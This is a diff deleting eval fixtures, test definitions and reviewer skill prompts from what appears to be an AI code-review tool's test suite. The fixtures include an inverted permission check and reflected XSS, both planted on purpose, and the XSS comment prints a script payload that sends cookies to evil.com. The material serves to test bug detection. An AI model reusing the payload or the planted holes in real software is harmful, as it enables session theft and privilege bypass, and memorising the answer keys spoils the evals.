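function buildSearchQuery(params: SearchParams): ParameterizedQuery {
  const conditions: string[] = [];
  const values: string[] = [];
  const columns = ["name", "email", "role"] as const;

  for (const column of columns) {
    const value = params[column];
    if (value) {
      values.push(value);
      conditions.push(`${column} = $${values.length}`);
    }
  }

  const whereClause = conditions.length > 0 ? ` WHERE ${conditions.join(" AND ")}` : "";
  return { sql: `SELECT id, name, email, role FROM users${whereClause}`, values };
}
```

With this shape, the payload from the fixture's comment ends up as an ordinary bound value rather than as part of the statement.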
package/evals/fixtures/stale-closure/counter.tsx
DELETED
|
@@ -1,33 +0,0 @@
|
|
|
1
|
-
import { useState, useEffect } from 'react';
|
|
2
|
-
|
|
3
|
-
interface CounterProps {
|
|
4
|
-
initialValue: number;
|
|
5
|
-
step: number;
|
|
6
|
-
intervalMs: number;
|
|
7
|
-
}
|
|
8
|
-
|
|
9
|
-
/**
|
|
10
|
-
* An auto-incrementing counter that ticks at a given interval.
|
|
11
|
-
*/
|
|
12
|
-
export function AutoCounter({ initialValue, step, intervalMs }: CounterProps) {
|
|
13
|
-
const [count, setCount] = useState(initialValue);
|
|
14
|
-
|
|
15
|
-
useEffect(() => {
|
|
16
|
-
// Bug: This closure captures `count` once at mount time.
|
|
17
|
-
// Every tick reads the same stale `count` value and sets
|
|
18
|
-
// count to initialValue + step, over and over. The counter
|
|
19
|
-
// never actually increments past the first tick.
|
|
20
|
-
const id = setInterval(() => {
|
|
21
|
-
setCount(count + step);
|
|
22
|
-
}, intervalMs);
|
|
23
|
-
|
|
24
|
-
return () => clearInterval(id);
|
|
25
|
-
// eslint-disable-next-line react-hooks/exhaustive-deps
|
|
26
|
-
}, []);
|
|
27
|
-
|
|
28
|
-
return (
|
|
29
|
-
<div>
|
|
30
|
-
<span data-testid="count">{count}</span>
|
|
31
|
-
</div>
|
|
32
|
-
);
|
|
33
|
-
}
|
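The stale-closure behavior described in the fixture's comment can be reproduced without React. The sketch below uses a small hand-written stand-in for state (`createState` is hypothetical and only mimics the value-or-updater form of a React state setter) to contrast a captured value with an updater function; in the component itself the corresponding call would be `setCount((c) => c + step)`.

```typescript
// Minimal stand-in for React state, used only to make the example runnable without React.
type Updater = number | ((previous: number) => number);

function createState(initial: number) {
  let value = initial;
  return {
    get: () => value,
    set: (next: Updater) => {
      value = typeof next === "function" ? next(value) : next;
    },
  };
}

const step = 2;

// Stale pattern: `count` is captured once, so every tick writes the same number.
const stale = createState(0);
const count = stale.get();
for (let tick = 0; tick < 3; tick++) {
  stale.set(count + step);
}

// Updater pattern: each tick receives the latest value instead of a captured one.
const fresh = createState(0);
for (let tick = 0; tick < 3; tick++) {
  fresh.set((previous) => previous + step);
}
```

After three ticks the stale variant holds 2 and the updater variant holds 6, which matches the comment's claim that the counter never advances past the first tick.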
package/evals/fixtures/wrong-comparison/validator.ts
DELETED
|
@@ -1,52 +0,0 @@
|
|
|
1
|
-
interface Permission {
|
|
2
|
-
resource: string;
|
|
3
|
-
action: 'read' | 'write' | 'delete';
|
|
4
|
-
role: string;
|
|
5
|
-
}
|
|
6
|
-
|
|
7
|
-
const ROLE_HIERARCHY: Record<string, number> = {
|
|
8
|
-
viewer: 0,
|
|
9
|
-
editor: 1,
|
|
10
|
-
admin: 2,
|
|
11
|
-
superadmin: 3,
|
|
12
|
-
};
|
|
13
|
-
|
|
14
|
-
/**
|
|
15
|
-
* Check if a user's role has sufficient permissions for an action.
|
|
16
|
-
* Returns true if the user is allowed to perform the action.
|
|
17
|
-
*/
|
|
18
|
-
export function hasPermission(userRole: string, requiredRole: string): boolean {
|
|
19
|
-
const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
|
|
20
|
-
const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
|
|
21
|
-
|
|
22
|
-
// Bug: should be >= but uses <=, so only users with LOWER privilege
|
|
23
|
-
// than required are granted access (e.g., a viewer can perform admin
|
|
24
|
-
// actions, but an admin cannot).
|
|
25
|
-
return userLevel <= requiredLevel;
|
|
26
|
-
}
|
|
27
|
-
|
|
28
|
-
/**
|
|
29
|
-
* Filter a list of permissions to only those a user can perform.
|
|
30
|
-
*/
|
|
31
|
-
export function filterAllowedActions(
|
|
32
|
-
userRole: string,
|
|
33
|
-
permissions: Permission[]
|
|
34
|
-
): Permission[] {
|
|
35
|
-
return permissions.filter((p) => hasPermission(userRole, p.role));
|
|
36
|
-
}
|
|
37
|
-
|
|
38
|
-
/**
|
|
39
|
-
* Validate that a user can perform a specific action on a resource.
|
|
40
|
-
*/
|
|
41
|
-
export function validateAccess(
|
|
42
|
-
userRole: string,
|
|
43
|
-
resource: string,
|
|
44
|
-
action: string,
|
|
45
|
-
permissions: Permission[]
|
|
46
|
-
): boolean {
|
|
47
|
-
const matching = permissions.find(
|
|
48
|
-
(p) => p.resource === resource && p.action === action
|
|
49
|
-
);
|
|
50
|
-
if (!matching) return false;
|
|
51
|
-
return hasPermission(userRole, matching.role);
|
|
52
|
-
}
|
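The fixture's comment says the comparison should be `>=`. A corrected check, sketched here as a standalone illustration, reuses the fixture's role levels; like the fixture, it treats an unknown role as level 0, which is kept only for parity and may not be a safe default in real code.

```typescript
const ROLE_HIERARCHY: Record<string, number> = {
  viewer: 0,
  editor: 1,
  admin: 2,
  superadmin: 3,
};

// A user qualifies when their level is at least the required level.
function hasPermission(userRole: string, requiredRole: string): boolean {
  const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
  const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
  return userLevel >= requiredLevel;
}
```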
package/evals/fixtures/xss-reflected/server.ts
DELETED
|
@@ -1,55 +0,0 @@
|
|
|
1
|
-
/**
|
|
2
|
-
* Simple HTTP request handler for a search page.
|
|
3
|
-
* Renders search results with the query term displayed back to the user.
|
|
4
|
-
*/
|
|
5
|
-
export function handleSearchRequest(url: string): string {
|
|
6
|
-
const parsed = new URL(url, 'http://localhost:3000');
|
|
7
|
-
const query = parsed.searchParams.get('q') ?? '';
|
|
8
|
-
const page = parseInt(parsed.searchParams.get('page') ?? '1', 10);
|
|
9
|
-
|
|
10
|
-
// Simulate search results
|
|
11
|
-
const results = performSearch(query, page);
|
|
12
|
-
|
|
13
|
-
// Bug: The query string from the URL is interpolated directly into HTML
|
|
14
|
-
// without escaping. An attacker can craft a URL like:
|
|
15
|
-
// /search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>
|
|
16
|
-
// and the script will execute in the victim's browser.
|
|
17
|
-
return `
|
|
18
|
-
<!DOCTYPE html>
|
|
19
|
-
<html>
|
|
20
|
-
<head><title>Search Results</title></head>
|
|
21
|
-
<body>
|
|
22
|
-
<h1>Search Results</h1>
|
|
23
|
-
<p>Showing results for: <strong>${query}</strong></p>
|
|
24
|
-
<p>Page ${page} of ${results.totalPages}</p>
|
|
25
|
-
<ul>
|
|
26
|
-
${results.items.map((item) => `<li>${escapeHtml(item.title)}</li>`).join('\n')}
|
|
27
|
-
</ul>
|
|
28
|
-
</body>
|
|
29
|
-
</html>
|
|
30
|
-
`;
|
|
31
|
-
}
|
|
32
|
-
|
|
33
|
-
function escapeHtml(text: string): string {
|
|
34
|
-
return text
|
|
35
|
-
.replace(/&/g, '&amp;')
|
|
36
|
-
.replace(/</g, '&lt;')
|
|
37
|
-
.replace(/>/g, '&gt;')
|
|
38
|
-
.replace(/"/g, '&quot;');
|
|
39
|
-
}
|
|
40
|
-
|
|
41
|
-
interface SearchResult {
|
|
42
|
-
items: { title: string; url: string }[];
|
|
43
|
-
totalPages: number;
|
|
44
|
-
}
|
|
45
|
-
|
|
46
|
-
function performSearch(query: string, page: number): SearchResult {
|
|
47
|
-
// Stub implementation
|
|
48
|
-
return {
|
|
49
|
-
items: [
|
|
50
|
-
{ title: `Result for "${query}" - item 1`, url: '/result/1' },
|
|
51
|
-
{ title: `Result for "${query}" - item 2`, url: '/result/2' },
|
|
52
|
-
],
|
|
53
|
-
totalPages: Math.max(1, page),
|
|
54
|
-
};
|
|
55
|
-
}
|
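The reflected XSS in the fixture above comes from interpolating `query` without escaping, while the result titles are escaped. A minimal sketch of the escaped form follows; `renderQueryLine` is a hypothetical helper introduced for illustration, and the escaping covers only the four characters the fixture's own `escapeHtml` handles.

```typescript
// Replace the characters that are significant in HTML text and double-quoted attributes.
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Hypothetical helper: renders the "Showing results for" line with the query escaped.
function renderQueryLine(query: string): string {
  return `<p>Showing results for: <strong>${escapeHtml(query)}</strong></p>`;
}
```

The ampersand is replaced first so that the entities produced by the later replacements are not escaped a second time.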
package/evals/precision.yaml
DELETED
|
@@ -1,15 +0,0 @@
|
|
|
1
|
-
skill: skills/precision.md
|
|
2
|
-
|
|
3
|
-
evals:
|
|
4
|
-
- name: ignores-style-issues
|
|
5
|
-
given: functionally correct code with style issues (mixed naming conventions, verbose conditionals, magic numbers)
|
|
6
|
-
files:
|
|
7
|
-
- fixtures/ignores-style-issues/utils.ts
|
|
8
|
-
should_find:
|
|
9
|
-
- finding: "no bugs: the code is functionally correct despite having style issues, so zero or only info-level findings are expected"
|
|
10
|
-
required: false
|
|
11
|
-
should_not_find:
|
|
12
|
-
- inconsistent naming convention (snake_case vs camelCase)
|
|
13
|
-
- missing JSDoc comments
|
|
14
|
-
- verbose conditional that could be simplified
|
|
15
|
-
- magic numbers in discount calculation
|
package/evals/security-scanning.yaml
DELETED
|
@@ -1,24 +0,0 @@
|
|
|
1
|
-
skill: skills/security-scanning.md
|
|
2
|
-
|
|
3
|
-
evals:
|
|
4
|
-
- name: sql-injection
|
|
5
|
-
given: SQL query built via string interpolation with user-supplied search parameters
|
|
6
|
-
files:
|
|
7
|
-
- fixtures/sql-injection/api.ts
|
|
8
|
-
should_find:
|
|
9
|
-
- finding: "SQL injection: user input from params.name, params.email, and params.role is directly interpolated into SQL query without parameterization"
|
|
10
|
-
severity: critical
|
|
11
|
-
should_not_find:
|
|
12
|
-
- the getConnection helper implementation
|
|
13
|
-
- missing email format validation as the primary issue
|
|
14
|
-
|
|
15
|
-
- name: xss-reflected
|
|
16
|
-
given: HTML template that renders URL query parameter directly into page without escaping
|
|
17
|
-
files:
|
|
18
|
-
- fixtures/xss-reflected/server.ts
|
|
19
|
-
should_find:
|
|
20
|
-
- finding: "reflected XSS: the query parameter from the URL is interpolated into HTML via template literal without calling escapeHtml()"
|
|
21
|
-
severity: critical
|
|
22
|
-
should_not_find:
|
|
23
|
-
- hardcoded port number
|
|
24
|
-
- missing HTTPS as the primary issue
|
package/evals/skills/bug-detection.md
DELETED
|
@@ -1,33 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: eval-bug-detection
|
|
3
|
-
description: Test skill for bug detection evals. Finds logic errors, null handling bugs, async issues, and edge cases.
|
|
4
|
-
---
|
|
5
|
-
|
|
6
|
-
You are an expert bug hunter analyzing code changes.
|
|
7
|
-
|
|
8
|
-
## What to Report
|
|
9
|
-
|
|
10
|
-
Find bugs that will cause incorrect behavior at runtime:
|
|
11
|
-
|
|
12
|
-
- Null/undefined property access without guards
|
|
13
|
-
- Off-by-one and boundary errors
|
|
14
|
-
- Missing await on async operations
|
|
15
|
-
- Wrong comparison operators (< vs <=, && vs ||)
|
|
16
|
-
- Stale closures capturing outdated values
|
|
17
|
-
- Type coercion causing unexpected behavior
|
|
18
|
-
|
|
19
|
-
## What NOT to Report
|
|
20
|
-
|
|
21
|
-
- Style or formatting preferences
|
|
22
|
-
- Missing error handling that "might" matter
|
|
23
|
-
- Performance concerns (unless causing incorrect behavior)
|
|
24
|
-
- Unused variables or dead code
|
|
25
|
-
- Missing tests or documentation
|
|
26
|
-
- Security vulnerabilities (separate concern)
|
|
27
|
-
|
|
28
|
-
## Output Requirements
|
|
29
|
-
|
|
30
|
-
For each bug, provide:
|
|
31
|
-
- The exact file and line
|
|
32
|
-
- What incorrect behavior occurs
|
|
33
|
-
- What specific input or condition triggers it
|
package/evals/skills/precision.md
DELETED
|
@@ -1,18 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: eval-precision
|
|
3
|
-
description: Test skill for precision evals. Only reports logic bugs, nothing else.
|
|
4
|
-
---
|
|
5
|
-
|
|
6
|
-
You are a strict bug detector. You ONLY report provable logic bugs.
|
|
7
|
-
|
|
8
|
-
## Rules
|
|
9
|
-
|
|
10
|
-
1. Only report bugs that WILL cause incorrect behavior
|
|
11
|
-
2. You must be able to construct a specific input that triggers failure
|
|
12
|
-
3. Do NOT report style, formatting, naming, or documentation issues
|
|
13
|
-
4. Do NOT report missing error handling
|
|
14
|
-
5. Do NOT report performance concerns
|
|
15
|
-
6. Do NOT report security vulnerabilities
|
|
16
|
-
7. If the code is correct, return an empty findings array
|
|
17
|
-
|
|
18
|
-
Be extremely conservative. When in doubt, do not report.
|